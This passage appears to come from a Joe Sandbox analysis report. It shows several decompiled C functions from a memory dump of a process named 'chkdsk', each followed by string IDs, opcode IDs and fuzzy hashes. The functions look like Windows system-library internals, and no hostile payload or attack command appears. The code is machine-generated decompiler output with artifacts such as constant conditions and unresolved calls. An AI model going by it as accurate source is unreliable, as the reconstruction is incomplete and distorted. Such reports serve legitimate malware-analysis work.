                                                      					if( *_t62 != 0) {
                                                      						_t63 =  *[fs:0x30];
                                                      						__eflags = _t63[0x240] & 0x00000002;
                                                      						if((_t63[0x240] & 0x00000002) != 0) {
                                                      							_t93 = _t109;
                                                      							E04E1FE87(_t93);
                                                      						}
                                                      					}
                                                      					if(_t104 != 0xffffffff) {
                                                      						_push(_t88);
                                                      						_push(0);
                                                      						_push(_t104);
                                                      						_t64 = E04DC9520();
                                                      						goto L15;
                                                      					} else {
                                                      						while(1) {
                                                      							_t97 =  &_v8;
                                                      							_t64 = E04DBE18B(_t109 + 4, _t97, 4, _t88, 0);
                                                      							if(_t64 == 0x102) {
                                                      								break;
                                                      							}
                                                      							_t93 =  *(_t109 + 4);
                                                      							_v8 = _t93;
                                                      							if((_t93 & 0x00000002) != 0) {
                                                      								continue;
                                                      							}
                                                      							L15:
                                                      							if(_t64 == 0x102) {
                                                      								break;
                                                      							}
                                                      							_t89 = _v24;
                                                      							if(_t64 < 0) {
                                                      								L04DDDF30(_t93, _t97, _t64);
                                                      								_push(_t93);
                                                      								_t98 = _t97 | 0xffffffff;
                                                      								__eflags =  *0x4e76901;
                                                      								_push(_t109);
                                                      								_v52 = _t98;
                                                      								if( *0x4e76901 != 0) {
                                                      									_push(0);
                                                      									_push(1);
                                                      									_push(0);
                                                      									_push(0x100003);
                                                      									_push( &_v12);
                                                      									_t72 = E04DC9980();
                                                      									__eflags = _t72;
                                                      									if(_t72 < 0) {
                                                      										_v12 = _t98 | 0xffffffff;
                                                      									}
                                                      								}
                                                      								asm("lock cmpxchg [ecx], edx");
                                                      								_t111 = 0;
                                                      								__eflags = 0;
                                                      								if(0 != 0) {
                                                      									__eflags = _v12 - 0xffffffff;
                                                      									if(_v12 != 0xffffffff) {
                                                      										_push(_v12);
                                                      										E04DC95D0();
                                                      									}
                                                      								} else {
                                                      									_t111 = _v12;
                                                      								}
                                                      								return _t111;
                                                      							} else {
                                                      								if(_t89 != 0) {
                                                      									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                      									_t77 = E04DA7D50();
                                                      									__eflags = _t77;
                                                      									if(_t77 == 0) {
                                                      										_t64 = 0x7ffe0384;
                                                      									} else {
                                                      										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                      									}
                                                      									__eflags =  *_t64;
                                                      									if( *_t64 != 0) {
                                                      										_t64 =  *[fs:0x30];
                                                      										__eflags = _t64[0x240] & 0x00000004;
                                                      										if((_t64[0x240] & 0x00000004) != 0) {
                                                      											_t78 = E04DA7D50();
                                                      											__eflags = _t78;
                                                      											if(_t78 == 0) {
                                                      												_t64 = 0x7ffe0385;
                                                      											} else {
                                                      												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                      											}
                                                      											__eflags =  *_t64 & 0x00000020;
                                                      											if(( *_t64 & 0x00000020) != 0) {
                                                      												_t64 = E04E07016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								return _t64;
                                                      							}
                                                      						}
                                                      						_t97 = _t88;
                                                      						_t93 = _t109;
                                                      						E04E1FDDA(_t97, _v12);
                                                      						_t105 =  *_t109;
                                                      						_t67 = _v12 + 1;
                                                      						_v12 = _t67;
                                                      						__eflags = _t105 - 0xffffffff;
                                                      						if(_t105 == 0xffffffff) {
                                                      							_t106 = 0;
                                                      							__eflags = 0;
                                                      						} else {
                                                      							_t106 =  *(_t105 + 0x14);
                                                      						}
                                                      						__eflags = _t67 - 2;
                                                      						if(_t67 > 2) {
                                                      							__eflags = _t109 - 0x4e75350;
                                                      							if(_t109 != 0x4e75350) {
                                                      								__eflags = _t106 - _v20;
                                                      								if(__eflags == 0) {
                                                      									_t93 = _t109;
                                                      									E04E1FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                      								}
                                                      							}
                                                      						}
                                                      						_push("RTL: Re-Waiting\n");
                                                      						_push(0);
                                                      						_push(0x65);
                                                      						_v20 = _t106;
                                                      						E04E15720();
                                                      						_t104 = _v28;
                                                      						_t116 = _t116 + 0xc;
                                                      						continue;
                                                      					}
                                                      				}
                                                      			}





































                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Re-Waiting
                                                      • API String ID: 0-316354757
                                                      • Opcode ID: 10d22954fe052abf6489f59287cfa4070e8b782d6aaadd24cb944443302d5585
                                                      • Instruction ID: 811a10aa0d92b5263413af8299a01be53ebe35f62a114acf5ffae1e609c0548d
                                                      • Opcode Fuzzy Hash: 10d22954fe052abf6489f59287cfa4070e8b782d6aaadd24cb944443302d5585
                                                      • Instruction Fuzzy Hash: E2610231B00644AFEB22EF68C880B7E77A5FB44728F1446ADE8529B2D0D774F9418791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			E04E50EA5(void* __ecx, void* __edx) {
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				intOrPtr _v28;
                                                      				unsigned int _v32;
                                                      				signed int _v36;
                                                      				intOrPtr _v40;
                                                      				char _v44;
                                                      				intOrPtr _v64;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				signed int _t58;
                                                      				unsigned int _t60;
                                                      				intOrPtr _t62;
                                                      				char* _t67;
                                                      				char* _t69;
                                                      				void* _t80;
                                                      				void* _t83;
                                                      				intOrPtr _t93;
                                                      				intOrPtr _t115;
                                                      				char _t117;
                                                      				void* _t120;
                                                      
                                                      				_t83 = __edx;
                                                      				_t117 = 0;
                                                      				_t120 = __ecx;
                                                      				_v44 = 0;
                                                      				if(E04E4FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                      					L24:
                                                      					_t109 = _v44;
                                                      					if(_v44 != 0) {
                                                      						E04E51074(_t83, _t120, _t109, _t117, _t117);
                                                      					}
                                                      					L26:
                                                      					return _t117;
                                                      				}
                                                      				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                      				_t5 = _t83 + 1; // 0x1
                                                      				_v36 = _t5 << 0xc;
                                                      				_v40 = _t93;
                                                      				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                      				asm("sbb ebx, ebx");
                                                      				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                      				if(_t58 != 0) {
                                                      					_push(0);
                                                      					_push(0x14);
                                                      					_push( &_v24);
                                                      					_push(3);
                                                      					_push(_t93);
                                                      					_push(0xffffffff);
                                                      					_t80 = E04DC9730();
                                                      					_t115 = _v64;
                                                      					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                      						_push(_t93);
                                                      						E04E4A80D(_t115, 1, _v20, _t117);
                                                      						_t83 = 4;
                                                      					}
                                                      				}
                                                      				if(E04E4A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                      					goto L24;
                                                      				}
                                                      				_t60 = _v32;
                                                      				_t97 = (_t60 != 0x100000) + 1;
                                                      				_t83 = (_v44 -  *0x4e78b04 >> 0x14) + (_v44 -  *0x4e78b04 >> 0x14);
                                                      				_v28 = (_t60 != 0x100000) + 1;
                                                      				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                      				_v40 = _t62;
                                                      				if(_t83 >= _t62) {
                                                      					L10:
                                                      					asm("lock xadd [eax], ecx");
                                                      					asm("lock xadd [eax], ecx");
                                                      					if(E04DA7D50() == 0) {
                                                      						_t67 = 0x7ffe0380;
                                                      					} else {
                                                      						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                      					}
                                                      					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                      						E04E4138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                      					}
                                                      					if(E04DA7D50() == 0) {
                                                      						_t69 = 0x7ffe0388;
                                                      					} else {
                                                      						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                      					}
                                                      					if( *_t69 != 0) {
                                                      						E04E3FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                      					}
                                                      					if(( *0x4e78724 & 0x00000008) != 0) {
                                                      						E04E452F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                      					}
                                                      					_t117 = _v44;
                                                      					goto L26;
                                                      				}
                                                      				while(E04E515B5(0x4e78ae4, _t83, _t97, _t97) >= 0) {
                                                      					_t97 = _v28;
                                                      					_t83 = _t83 + 2;
                                                      					if(_t83 < _v40) {
                                                      						continue;
                                                      					}
                                                      					goto L10;
                                                      				}
                                                      				goto L24;
                                                      			}

























                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: af22593461f5fbaea86017d80ff29abd540f78d20ea1bec82272f662201a7b46
                                                      • Instruction ID: 359955cd586c0b569272cae7a8dbbe6ab7db631c878482ee843aef1bbb5a5bd8
                                                      • Opcode Fuzzy Hash: af22593461f5fbaea86017d80ff29abd540f78d20ea1bec82272f662201a7b46
                                                      • Instruction Fuzzy Hash: 9051AD716043429FE725DF28D884B2BB7E5EBC4718F045A2DF996972A0D770F805CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E04DBF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				char* _v20;
                                                      				intOrPtr _v24;
                                                      				char _v28;
                                                      				intOrPtr _v32;
                                                      				char _v36;
                                                      				char _v44;
                                                      				char _v52;
                                                      				intOrPtr _v56;
                                                      				char _v60;
                                                      				intOrPtr _v72;
                                                      				void* _t51;
                                                      				void* _t58;
                                                      				signed short _t82;
                                                      				short _t84;
                                                      				signed int _t91;
                                                      				signed int _t100;
                                                      				signed short* _t103;
                                                      				void* _t108;
                                                      				intOrPtr* _t109;
                                                      
                                                      				_t103 = __ecx;
                                                      				_t82 = __edx;
                                                      				_t51 = E04DA4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                      				if(_t51 >= 0) {
                                                      					_push(0x21);
                                                      					_push(3);
                                                      					_v56 =  *0x7ffe02dc;
                                                      					_v20 =  &_v52;
                                                      					_push( &_v44);
                                                      					_v28 = 0x18;
                                                      					_push( &_v28);
                                                      					_push(0x100020);
                                                      					_v24 = 0;
                                                      					_push( &_v60);
                                                      					_v16 = 0x40;
                                                      					_v12 = 0;
                                                      					_v8 = 0;
                                                      					_t58 = E04DC9830();
                                                      					_t87 =  *[fs:0x30];
                                                      					_t108 = _t58;
                                                      					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                      					if(_t108 < 0) {
                                                      						L11:
                                                      						_t51 = _t108;
                                                      					} else {
                                                      						_push(4);
                                                      						_push(8);
                                                      						_push( &_v36);
                                                      						_push( &_v44);
                                                      						_push(_v60);
                                                      						_t108 = E04DC9990();
                                                      						if(_t108 < 0) {
                                                      							L10:
                                                      							_push(_v60);
                                                      							E04DC95D0();
                                                      							goto L11;
                                                      						} else {
                                                      							_t18 = _t82 + 0x18; // 0x302bc81a
                                                      							_t109 = L04DA4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                      							if(_t109 == 0) {
                                                      								_t108 = 0xc0000017;
                                                      								goto L10;
                                                      							} else {
                                                      								_t21 = _t109 + 0x18; // 0x18
                                                      								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                      								 *_t109 = 1;
                                                      								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                      								 *(_t109 + 0xe) = _t82;
                                                      								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                      								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                      								_t29 =  &(_t103[2]); // 0x2000302b
                                                      								E04DCF3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
                                                      								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                      								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                      								_t91 =  *_t103 & 0x0000ffff;
                                                      								_t34 =  &(_t103[2]); // 0x2000302b
                                                      								_t100 = _t91 & 0xfffffffe;
                                                      								_t84 = 0x5c;
                                                      								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
                                                      									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                      										_push(_v60);
                                                      										E04DC95D0();
                                                      										L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                      										_t51 = 0xc0000106;
                                                      									} else {
                                                      										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                      										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                      										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                      										goto L5;
                                                      									}
                                                      								} else {
                                                      									L5:
                                                      									 *_a4 = _t109;
                                                      									_t51 = 0;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t51;
                                                      			}


























                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction ID: 12f21eafd31e6fc52d7b54f50fb2b01d49d0231adce88f6a4ba5280972e70eb4
                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction Fuzzy Hash: 60516C71604711AFD321DF29C840A6BBBF8FF48754F00892EF99697690E7B4E914CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E04E03540(intOrPtr _a4) {
                                                      				signed int _v12;
                                                      				intOrPtr _v88;
                                                      				intOrPtr _v92;
                                                      				char _v96;
                                                      				char _v352;
                                                      				char _v1072;
                                                      				intOrPtr _v1140;
                                                      				intOrPtr _v1148;
                                                      				char _v1152;
                                                      				char _v1156;
                                                      				char _v1160;
                                                      				char _v1164;
                                                      				char _v1168;
                                                      				char* _v1172;
                                                      				short _v1174;
                                                      				char _v1176;
                                                      				char _v1180;
                                                      				char _v1192;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				short _t41;
                                                      				short _t42;
                                                      				intOrPtr _t80;
                                                      				intOrPtr _t81;
                                                      				signed int _t82;
                                                      				void* _t83;
                                                      
                                                      				_v12 =  *0x4e7d360 ^ _t82;
                                                      				_t41 = 0x14;
                                                      				_v1176 = _t41;
                                                      				_t42 = 0x16;
                                                      				_v1174 = _t42;
                                                      				_v1164 = 0x100;
                                                      				_v1172 = L"BinaryHash";
                                                      				_t81 = E04DC0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                      				if(_t81 < 0) {
                                                      					L11:
                                                      					_t75 = _t81;
                                                      					E04E03706(0, _t81, _t79, _t80);
                                                      					L12:
                                                      					if(_a4 != 0xc000047f) {
                                                      						E04DCFA60( &_v1152, 0, 0x50);
                                                      						_v1152 = 0x60c201e;
                                                      						_v1148 = 1;
                                                      						_v1140 = E04E03540;
                                                      						E04DCFA60( &_v1072, 0, 0x2cc);
                                                      						_push( &_v1072);
                                                      						E04DDDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                      						E04E10C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                      						_push(_v1152);
                                                      						_push(0xffffffff);
                                                      						E04DC97C0();
                                                      					}
                                                      					return E04DCB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                      				}
                                                      				_t79 =  &_v352;
                                                      				_t81 = E04E03971(0, _a4,  &_v352,  &_v1156);
                                                      				if(_t81 < 0) {
                                                      					goto L11;
                                                      				}
                                                      				_t75 = _v1156;
                                                      				_t79 =  &_v1160;
                                                      				_t81 = E04E03884(_v1156,  &_v1160,  &_v1168);
                                                      				if(_t81 >= 0) {
                                                      					_t80 = _v1160;
                                                      					E04DCFA60( &_v96, 0, 0x50);
                                                      					_t83 = _t83 + 0xc;
                                                      					_push( &_v1180);
                                                      					_push(0x50);
                                                      					_push( &_v96);
                                                      					_push(2);
                                                      					_push( &_v1176);
                                                      					_push(_v1156);
                                                      					_t81 = E04DC9650();
                                                      					if(_t81 >= 0) {
                                                      						if(_v92 != 3 || _v88 == 0) {
                                                      							_t81 = 0xc000090b;
                                                      						}
                                                      						if(_t81 >= 0) {
                                                      							_t75 = _a4;
                                                      							_t79 =  &_v352;
                                                      							E04E03787(_a4,  &_v352, _t80);
                                                      						}
                                                      					}
                                                      					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                      				}
                                                      				_push(_v1156);
                                                      				E04DC95D0();
                                                      				if(_t81 >= 0) {
                                                      					goto L12;
                                                      				} else {
                                                      					goto L11;
                                                      				}
                                                      			}
































                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: BinaryHash
                                                      • API String ID: 2994545307-2202222882
                                                      • Opcode ID: c8775016572c92fcc0ec9820613f8f73ee076271a3029efe9ccf323ba53a9025
                                                      • Instruction ID: c49d6372b38f3c92e324a09febd61599317f37ef965c3e736bd51ca63023e8e4
                                                      • Opcode Fuzzy Hash: c8775016572c92fcc0ec9820613f8f73ee076271a3029efe9ccf323ba53a9025
                                                      • Instruction Fuzzy Hash: 8A4136F1D0152D9AEB21DB50DC84FDEB77CDB44718F008595AA19A7280DB30AE888FA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E04E505AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				signed int _v28;
                                                      				char _v32;
                                                      				signed int _v36;
                                                      				intOrPtr _v40;
                                                      				void* __ebx;
                                                      				void* _t35;
                                                      				signed int _t42;
                                                      				char* _t48;
                                                      				signed int _t59;
                                                      				signed char _t61;
                                                      				signed int* _t79;
                                                      				void* _t88;
                                                      
                                                      				_v28 = __edx;
                                                      				_t79 = __ecx;
                                                      				if(E04E507DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                      					L13:
                                                      					_t35 = 0;
                                                      					L14:
                                                      					return _t35;
                                                      				}
                                                      				_t61 = __ecx[1];
                                                      				_t59 = __ecx[0xf];
                                                      				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                      				_v36 = _a8 << 0xc;
                                                      				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                      				asm("sbb esi, esi");
                                                      				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                      				if(_t42 != 0) {
                                                      					_push(0);
                                                      					_push(0x14);
                                                      					_push( &_v24);
                                                      					_push(3);
                                                      					_push(_t59);
                                                      					_push(0xffffffff);
                                                      					if(E04DC9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                      						_push(_t61);
                                                      						E04E4A80D(_t59, 1, _v20, 0);
                                                      						_t88 = 4;
                                                      					}
                                                      				}
                                                      				_t35 = E04E4A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                      				if(_t35 < 0) {
                                                      					goto L14;
                                                      				}
                                                      				E04E51293(_t79, _v40, E04E507DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                      				if(E04DA7D50() == 0) {
                                                      					_t48 = 0x7ffe0380;
                                                      				} else {
                                                      					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                      				}
                                                      				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                      					E04E4138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                      				}
                                                      				goto L13;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction ID: 47b9ea9b915f6c042e8c419aeeecc807db4e849899cbaf59c2899e8bf134aa27
                                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction Fuzzy Hash: F831E032704305ABE720DF24CC85F9A77D9EBC4768F044629FD58AB690D6B0F904CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 72%
                                                      			E04E03884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                      				char _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				char* _v20;
                                                      				short _v22;
                                                      				char _v24;
                                                      				intOrPtr _t38;
                                                      				short _t40;
                                                      				short _t41;
                                                      				void* _t44;
                                                      				intOrPtr _t47;
                                                      				void* _t48;
                                                      
                                                      				_v16 = __edx;
                                                      				_t40 = 0x14;
                                                      				_v24 = _t40;
                                                      				_t41 = 0x16;
                                                      				_v22 = _t41;
                                                      				_t38 = 0;
                                                      				_v12 = __ecx;
                                                      				_push( &_v8);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(2);
                                                      				_t43 =  &_v24;
                                                      				_v20 = L"BinaryName";
                                                      				_push( &_v24);
                                                      				_push(__ecx);
                                                      				_t47 = 0;
                                                      				_t48 = E04DC9650();
                                                      				if(_t48 >= 0) {
                                                      					_t48 = 0xc000090b;
                                                      				}
                                                      				if(_t48 != 0xc0000023) {
                                                      					_t44 = 0;
                                                      					L13:
                                                      					if(_t48 < 0) {
                                                      						L16:
                                                      						if(_t47 != 0) {
                                                      							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                      						}
                                                      						L18:
                                                      						return _t48;
                                                      					}
                                                      					 *_v16 = _t38;
                                                      					 *_a4 = _t47;
                                                      					goto L18;
                                                      				}
                                                      				_t47 = L04DA4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                      				if(_t47 != 0) {
                                                      					_push( &_v8);
                                                      					_push(_v8);
                                                      					_push(_t47);
                                                      					_push(2);
                                                      					_push( &_v24);
                                                      					_push(_v12);
                                                      					_t48 = E04DC9650();
                                                      					if(_t48 < 0) {
                                                      						_t44 = 0;
                                                      						goto L16;
                                                      					}
                                                      					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                      						_t48 = 0xc000090b;
                                                      					}
                                                      					_t44 = 0;
                                                      					if(_t48 < 0) {
                                                      						goto L16;
                                                      					} else {
                                                      						_t17 = _t47 + 0xc; // 0xc
                                                      						_t38 = _t17;
                                                      						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                      							_t48 = 0xc000090b;
                                                      						}
                                                      						goto L13;
                                                      					}
                                                      				}
                                                      				_t48 = _t48 + 0xfffffff4;
                                                      				goto L18;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: BinaryName
                                                      • API String ID: 2994545307-215506332
                                                      • Opcode ID: cd911388c9cd1615e65591adf5e223965756f901be2eba04132cd1a68d0417d2
                                                      • Instruction ID: 5afbb0047eeebdf918dffec27584d6579ead990f7caebed644a45d2cea47b02c
                                                      • Opcode Fuzzy Hash: cd911388c9cd1615e65591adf5e223965756f901be2eba04132cd1a68d0417d2
                                                      • Instruction Fuzzy Hash: C0310572E0050AAFEB25DB58C945DBBB774EB40B24F118169ED25A76C0D730BE40C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 33%
                                                      			E04DBD294(void* __ecx, char __edx, void* __eflags) {
                                                      				signed int _v8;
                                                      				char _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				intOrPtr _v64;
                                                      				char* _v68;
                                                      				intOrPtr _v72;
                                                      				char _v76;
                                                      				signed int _v84;
                                                      				intOrPtr _v88;
                                                      				char _v92;
                                                      				intOrPtr _v96;
                                                      				intOrPtr _v100;
                                                      				char _v104;
                                                      				char _v105;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t35;
                                                      				char _t38;
                                                      				signed int _t40;
                                                      				signed int _t44;
                                                      				signed int _t52;
                                                      				void* _t53;
                                                      				void* _t55;
                                                      				void* _t61;
                                                      				intOrPtr _t62;
                                                      				void* _t64;
                                                      				signed int _t65;
                                                      				signed int _t66;
                                                      
                                                      				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                      				_v8 =  *0x4e7d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                      				_v105 = __edx;
                                                      				_push( &_v92);
                                                      				_t52 = 0;
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push( &_v104);
                                                      				_push(0);
                                                      				_t59 = __ecx;
                                                      				_t55 = 2;
                                                      				if(E04DA4120(_t55, __ecx) < 0) {
                                                      					_t35 = 0;
                                                      					L8:
                                                      					_pop(_t61);
                                                      					_pop(_t64);
                                                      					_pop(_t53);
                                                      					return E04DCB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                      				}
                                                      				_v96 = _v100;
                                                      				_t38 = _v92;
                                                      				if(_t38 != 0) {
                                                      					_v104 = _t38;
                                                      					_v100 = _v88;
                                                      					_t40 = _v84;
                                                      				} else {
                                                      					_t40 = 0;
                                                      				}
                                                      				_v72 = _t40;
                                                      				_v68 =  &_v104;
                                                      				_push( &_v52);
                                                      				_v76 = 0x18;
                                                      				_push( &_v76);
                                                      				_v64 = 0x40;
                                                      				_v60 = _t52;
                                                      				_v56 = _t52;
                                                      				_t44 = E04DC98D0();
                                                      				_t62 = _v88;
                                                      				_t65 = _t44;
                                                      				if(_t62 != 0) {
                                                      					asm("lock xadd [edi], eax");
                                                      					if((_t44 | 0xffffffff) != 0) {
                                                      						goto L4;
                                                      					}
                                                      					_push( *((intOrPtr*)(_t62 + 4)));
                                                      					E04DC95D0();
                                                      					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                      					goto L4;
                                                      				} else {
                                                      					L4:
